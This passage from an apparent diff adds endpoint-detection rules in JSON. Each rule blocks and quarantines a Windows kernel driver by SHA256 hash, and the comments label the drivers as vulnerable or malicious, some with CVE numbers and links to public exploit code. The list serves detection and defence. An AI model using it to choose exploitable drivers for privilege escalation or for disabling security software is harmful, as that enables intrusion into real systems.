+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811764Z",
+ "creation_date": "2026-03-23T11:45:31.811766Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9d8be1fa973114a45254ddc7d925a2ce9349fdebded42caf8dac724afd0cfc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "004ed130-1032-5e7f-b2e6-ef0866d53b9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152722Z",
+ "creation_date": "2026-03-23T11:45:31.152725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cab6ae2ea21cc943a0c0e27f25de5bed2b801ac2863d7123334634411bcb3cf6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0054d0e0-4d3e-5aed-b367-10ee3412c190",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476211Z",
+ "creation_date": "2026-03-23T11:45:31.476214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9142fe1834f09556508cb0af1c9258211654e08a3d64aad27a46d1cdd56c17b7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "005857e6-bff5-5551-8cb0-df874e1d802a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829096Z",
+ "creation_date": "2026-03-23T11:45:30.829098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b74f31ad89c969bd1e154729c3e50136a3804fb759d164ed9d3247d791122b6b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00634432-7aa3-53f2-b194-f49bb3bf6de4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824969Z",
+ "creation_date": "2026-03-23T11:45:31.824972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b11d13216855f507240d4e5d56bd5f53ce38669db22a7a6d6a0b37bba99e0403",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0068f420-1cf4-599c-818a-683a69750f9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145205Z",
+ "creation_date": "2026-03-23T11:45:32.145207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7ff6a8a70471991d00525b02071eff55a2252d7f8dfb299ac2d169e811f6a84",
+ "comment": "Malicious Kernel Driver (aka driver_981d03e1.sys) [https://www.loldrivers.io/drivers/1106fe7a-b78b-4edf-85c0-6208979f380b/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0074af71-a717-5d22-aa31-f53758720ddc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154332Z",
+ "creation_date": "2026-03-23T11:45:31.154334Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7780bd43d0642303063ddaeca5de98b997d6302f6e6a4fd496561b13262a3b74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "008468fd-f453-54a0-b63e-7e7c7ff7c681",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159229Z",
+ "creation_date": "2026-03-23T11:45:31.159231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f43846327935f1cc29daf07730eb39f44cd3b26c770df770d2068a9a5e2aed0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0088cc75-6f09-5f46-b77e-30f2c576971e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494846Z",
+ "creation_date": "2026-03-23T11:45:31.494848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "322d95fbb0e6a856576a4fe58c30fb67eab8fb2ca29512972d65145cbce73016",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00896919-433d-5110-b167-1ba05552c2a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830040Z",
+ "creation_date": "2026-03-23T11:45:30.830042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d01d0e15698f945ff5a4c6db58fa66841122daad129298aa10e1d460c2b25a53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0093ca17-b196-5fee-b016-5531682b7457",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457831Z",
+ "creation_date": "2026-03-23T11:45:30.457835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf91e8f64a7c98dbeab21597bd76723aee892ed8fa4ee44b09f9e75089308e2",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0094a78f-4b42-525b-ab15-4e66cd3fe9b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495058Z",
+ "creation_date": "2026-03-23T11:45:31.495060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "825f9c3992e03dfad566039f1651228ba74195f04e4b715ff9a6dc339236a136",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "009b7d33-88a2-5c92-8026-74cfb6b2c2d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975516Z",
+ "creation_date": "2026-03-23T11:45:29.975518Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975524Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a67131e5e7ea45a8b53b6f924d418dfda716a00c2b12ab4d6ee5724c9f0d5549",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00a40f0a-fd59-59ae-a047-1fd24b02af7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980716Z",
+ "creation_date": "2026-03-23T11:45:29.980718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980723Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2121a2bb8ebbf2e6e82c782b6f3c6b7904f686aa495def25cf1cf52a42e16109",
+ "comment": "Vulnerable Kernel Driver (aka CtiIo64.sys) [https://www.loldrivers.io/drivers/de365e80-45cb-48fb-af6e-0a96a5ad7777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00a97769-b5ce-5b5f-8719-44bbe3d869ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476420Z",
+ "creation_date": "2026-03-23T11:45:30.476427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b7177e9a10c1392633c5f605600bb23c8629379f7f42957972374a05d4dc458",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00aa84e7-b9ff-54be-8e11-7cd6003e0bb3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810236Z",
+ "creation_date": "2026-03-23T11:45:31.810238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810244Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff439e7007d97b7e56acfb95ba29a9c9884bf5c0242ff46d11e5cfd8ac5ecfe0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00b98a8c-3b1d-5429-bd09-b4c326e2a065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606723Z",
+ "creation_date": "2026-03-23T11:45:29.606725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cee01c69cb0c06dd0d98ff05aeb2b0a34a4aa1a71d35a3033bf9c1a35b637c55",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00cd50bc-fafd-52ec-9d30-ea16cf31b1b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822385Z",
+ "creation_date": "2026-03-23T11:45:31.822388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822396Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b458eb6aad837cb6723320ceea1883c07ada507659a4688aedb46954f3f33417",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00d00975-c936-5c33-a724-cc64bbb5bdb4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620460Z",
+ "creation_date": "2026-03-23T11:45:29.620462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00e1229c-c643-5b96-9676-3995625f21e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487291Z",
+ "creation_date": "2026-03-23T11:45:31.487293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10c033adf816f4d502e5fa15c0642f0be92bb921b63f1a3190ed41267d60156f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00ed41f8-421e-5823-8056-ca7604607c57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613347Z",
+ "creation_date": "2026-03-23T11:45:29.613351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00f33ddc-9494-5bbd-b8cd-111fe5662e07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475154Z",
+ "creation_date": "2026-03-23T11:45:31.475157Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92ab76ddfafbaaec1e358bdf558ec23ea6d029c81f80d01ddf89a9daed8d564f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00f58f92-a180-572c-81d4-f5f9420317f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
